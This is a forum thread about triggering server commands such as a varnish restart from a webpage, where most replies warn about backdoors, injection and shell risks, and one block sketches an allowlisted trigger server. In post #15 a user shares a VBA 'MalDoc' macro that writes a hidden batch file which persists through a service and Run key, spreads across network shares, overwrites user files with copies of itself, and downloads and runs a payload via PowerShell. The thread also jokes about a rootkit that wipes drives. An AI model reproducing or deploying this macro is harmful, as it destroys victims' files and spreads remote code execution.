
Issuing shell commands from a webpage?

  1. #1
    Star Trek VI: The Undiscovered Country Dark Matter [my scoffingly uncritical tinning]
    I would like to be able to basically do a couple of commands - eg service varnish restart (as root) from a webpage.

    Is that doable?
  2. #2
    -SpectraL coward [the spuriously bluish-lilac bushman]
    /etc/varnish/default.vcl

    backend default {
    .host = "localhost";
    .port = "8080";
    }
  3. #3
    Star Trek VI: The Undiscovered Country Dark Matter [my scoffingly uncritical tinning]
    Lol, that looks familiar alright.

    Anyway I have my vcl file as good as I'm going to get it for now.
  4. #4
    Star Trek VI: The Undiscovered Country Dark Matter [my scoffingly uncritical tinning]
    And varnish is supporting 1000 simultaneous requests, which is A) awesome and B) the goal.

    Now it's time to worry about allowing people to actually update the website, keeping in mind that the backend takes like 6 seconds to respond, so allowing clients to hit it simply isn't an option.

    Which means that a cache-warming strategy is a necessity. Which we have, but I need to be able to call it without requiring an SSH session.
  5. #5
    aldra JIDF Controlled Opposition
    https://gist.github.com/rshipp/eee36684db07d234c1cc
  6. #6
    Admin African Astronaut
    It's actually quite easy but unsafe. This is of course if you're referring to accessing a webpage that's hosted on a server that you control.
  7. #7
    Lanny Bird of Courage
    Originally posted by Admin It's actually quite easy but unsafe. This is of course if you're referring to accessing a webpage that's hosted on a server that you control.

    Yeah, this. You can stand up a small web server that runs commands taken from requests to it but that's wildly insecure and basically backdooring yourself. You can set it up to run a specific command when a request is made but you have to worry about things like "what happens if someone requests this a thousand times in a second" or "do I take any parameters from the request that can open me up to injection attacks" and such. And if you're spawning a shell you have to ask "whose profile is this sourcing and what happens when that changes".

    I mean in some sense every HTTP request is "run some command on a remote server and maybe provide some data back" but shells and subprocesses are tricky and just require you to think about all the ways that they can be exploited or fail.
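
The "run one specific command per request" setup described in the post above, sketched as an added example (not code from the thread or the linked gist). The action names, the warm-cache script path, the `X-Trigger-Token` header, port 8099 and the `TRIGGER_TOKEN` variable are assumptions, and the sudo entry presumes a sudoers rule limited to that exact command.

```python
import hmac, subprocess, time
from http.server import BaseHTTPRequestHandler, HTTPServer

# Assumed allowlist: action name -> fixed argv. No request data ever reaches argv.
ACTIONS = {
    "restart-varnish": ["/usr/bin/sudo", "-n", "/usr/sbin/service", "varnish", "restart"],
    "warm-cache": ["/usr/local/bin/warm-cache"],  # hypothetical script path
}
COOLDOWN = 30  # seconds that must pass between two runs of the same action
CLEAN_ENV = {"PATH": "/usr/sbin:/usr/bin:/sbin:/bin", "LANG": "C"}  # no user profile

class Trigger:
    def __init__(self, token, runner=subprocess.run, clock=time.monotonic):
        self.token, self.runner, self.clock = token.encode(), runner, clock
        self.last_run = {}

    def handle(self, action, presented):
        """Return (http_status, message) for one trigger request."""
        if not hmac.compare_digest(presented.encode(), self.token):
            return 403, "forbidden"
        argv = ACTIONS.get(action)  # anything not in the allowlist is rejected
        if argv is None:
            return 404, "unknown action"
        now = self.clock()
        if action in self.last_run and now - self.last_run[action] < COOLDOWN:
            return 429, "cooling down"  # a request flood cannot become a restart flood
        self.last_run[action] = now
        try:  # argv list + shell=False: no shell, no rc files, no word splitting
            done = self.runner(argv, shell=False, env=CLEAN_ENV, timeout=60,
                               stdin=subprocess.DEVNULL, capture_output=True)
        except (OSError, subprocess.SubprocessError):
            return 500, "command failed"
        return (200, "ok") if done.returncode == 0 else (500, "command failed")

def make_handler(trigger):
    class Handler(BaseHTTPRequestHandler):
        def do_POST(self):  # the path only selects an action; it is never executed
            status, msg = trigger.handle(self.path.lstrip("/"),
                                         self.headers.get("X-Trigger-Token", ""))
            self.send_response(status)
            self.end_headers()
            self.wfile.write(msg.encode() + b"\n")
    return Handler

if __name__ == "__main__":
    import os  # the token comes from the environment, not from the source file
    HTTPServer(("127.0.0.1", 8099), make_handler(Trigger(os.environ["TRIGGER_TOKEN"]))).serve_forever()
```

The listener binds to loopback only, so it is meant to sit behind an authenticated reverse proxy or an SSH tunnel rather than face the internet directly.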
  8. #8
    Star Trek VI: The Undiscovered Country Dark Matter [my scoffingly uncritical tinning]
    Thanks.

    I got the cache refreshing just fine by getting varnish to serve up files, and also refresh the cache object after the file has been served. This enables the people updating the site to avoid having to use any control interface besides just waiting 10 seconds and refreshing, and also ensures no customer ever has to wait for the slow-ass backend to work.

    TBH setting it up was all far more complicated than it should have been.
  9. #9
    Sophie Pedophile Tech Support
    If you absolutely have to spawn a shell, permission jail it. Make sure it can't do anything other than what you want it to do, read up on breaking out of a jailed shell too if you wanna do your due diligence. I'd counsel against it in general though. It's a good way of getting owned.
  10. #10
    aldra JIDF Controlled Opposition
    yeah I would not recommend using it more than once. if you need remote terminal access set up ssh

    ***or in your case, some sort of conditional trigger for the script
  11. #11
    Fonaplats victim of incest [daylong jump-start that nome]
    Just message her on FB.
  12. #12
    Admin African Astronaut
    It's really just a bad idea. You could also make it as confusing as possible in hopes an attacker would miss it.
  13. #13
    -SpectraL coward [the spuriously bluish-lilac bushman]
    Originally posted by Admin It's really just a bad idea. You could also make it as confusing as possible in hopes an attacker would miss it.

    Best to set up a malicious honey pot, so when they try to exploit the hole, they end up getting infected with a rootkit that deletes their entire hard drive instead.
  14. #14
    Sophie Pedophile Tech Support
    Originally posted by Admin It's really just a bad idea. You could also make it as confusing as possible in hopes an attacker would miss it.

    Security through obscurity has dubious utility. In my estimation it should be something you set up as a complementary measure.
  15. #15
    Sophie Pedophile Tech Support
    Originally posted by -SpectraL Best to set up a malicious honey pot, so when they try to exploit the hole, they end up getting infected with a rootkit that deletes their entire hard drive instead.

    You're overthinking it. Just set up a regular honeypot, put some important looking documents in there somewhere. But make sure all these documents are actually MalDocs.

    In fact I'm taking a little break from coding at the moment but I had this open in my text editor as well.


    Public Sub ware()

    Const s = "c:\s.bat"

    Dim FileNumber As Integer
    Dim retVal As Variant

    FileNumber = FreeFile

    'creat batch file
    Open s For Output As #FileNumber
    Print #FileNumber, "@echo off"
    Print #FileNumber, "set gg=0"
    Print #FileNumber, "set servicename=DE"
    Print #FileNumber, "echo sc create %servicename% binpath=%0 >> service.bat"
    Print #FileNumber, "echo sc start %servicename% >> service.bat"
    Print #FileNumber, "attrib +h +r +s service.bat"
    Print #FileNumber, "start service.bat"
    Print #FileNumber, "reg add "; HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run; " /v "; Windows; Services; " /t "; REG_SZ; " /d %0"
    Print #FileNumber, "attrib +h +r +s %0"
    Print #FileNumber, ":abdhd"
    Print #FileNumber, "net use Z: \\192.168.1.%gg%\C$"
    Print #FileNumber, "if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.bat""
    Print #FileNumber, "mountvol Z: /d)"
    Print #FileNumber, "if %i% == 256 (goto infect) else (set /a i=i+1)"
    Print #FileNumber, "goto abdhd"
    Print #FileNumber, ":infect"
    Print #FileNumber, "for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.bat)"
    Print #FileNumber, "for /f %%f in ('dir C:\Users\*.bat /s /b') do (copy %0 %%f)"
    Print #FileNumber, ":payload"
    Print #FileNumber, "powershell -Command "(New-Object Net.WebClient).DownloadFile('Direct Link Here', 'Download_Execute.exe')""
    Print #FileNumber, "powershell -Command "Invoke-WebRequest <Direct Link Here> -OutFile Downoad_Execute.exe""
    Print #FileNumber, "start %USERPROFILE%\Downloads\Download_Execute.exe"
    Close #FileNumber

    'run batch file
    retVal = Shell(MY_FILENAME, vbNormalFocus)

    ' NOTE THE BATCH FILE WILL RUN, BUT THE CODE WILL CONTINUE TO RUN.
    If retVal = 0 Then
    MsgBox "An Error Occured"
    Close #FileNumber
    End
    End If

    'Delete batch file
    Kill MY_FILENAME

    End Sub


    I didn't write this but I was messing around with it the other day. I also found out that LibreOffice supports Macros as well. So instead of jumping through hoops with executables and batch files and random PowerShell invocations and shit, you could have your Macro simply download a python script and execute it directly if the adversary is on Linux.